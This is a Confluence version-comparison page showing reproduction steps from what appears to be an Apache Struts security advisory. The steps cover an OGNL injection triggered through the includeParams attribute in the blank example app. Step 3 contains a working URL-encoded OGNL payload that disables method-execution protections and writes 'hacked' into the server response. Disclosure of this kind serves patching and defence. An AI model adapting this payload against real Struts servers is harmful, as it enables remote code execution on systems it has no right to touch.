Versions Compared

Old Version 12

changes.mady.by.user Lukasz Lenart

Saved on

compared with

New Version 13

changes.mady.by.user Lukasz Lenart

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.
Comment: Migrated to Confluence 4.0

...

  1. Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
    Code Block
     includeParams="all"
    Such that the line will be something look like this:
    Code Block
    xml
    xml
    <s:url id="url" action="HelloWorld" includeParams="all">
    (it works also with includeParams="get").
  2. Run struts2-blank app
  3. Open the url: http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D
    (this is the shortened version http://goo.gl/lhlTlImage Removed)

As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter.

...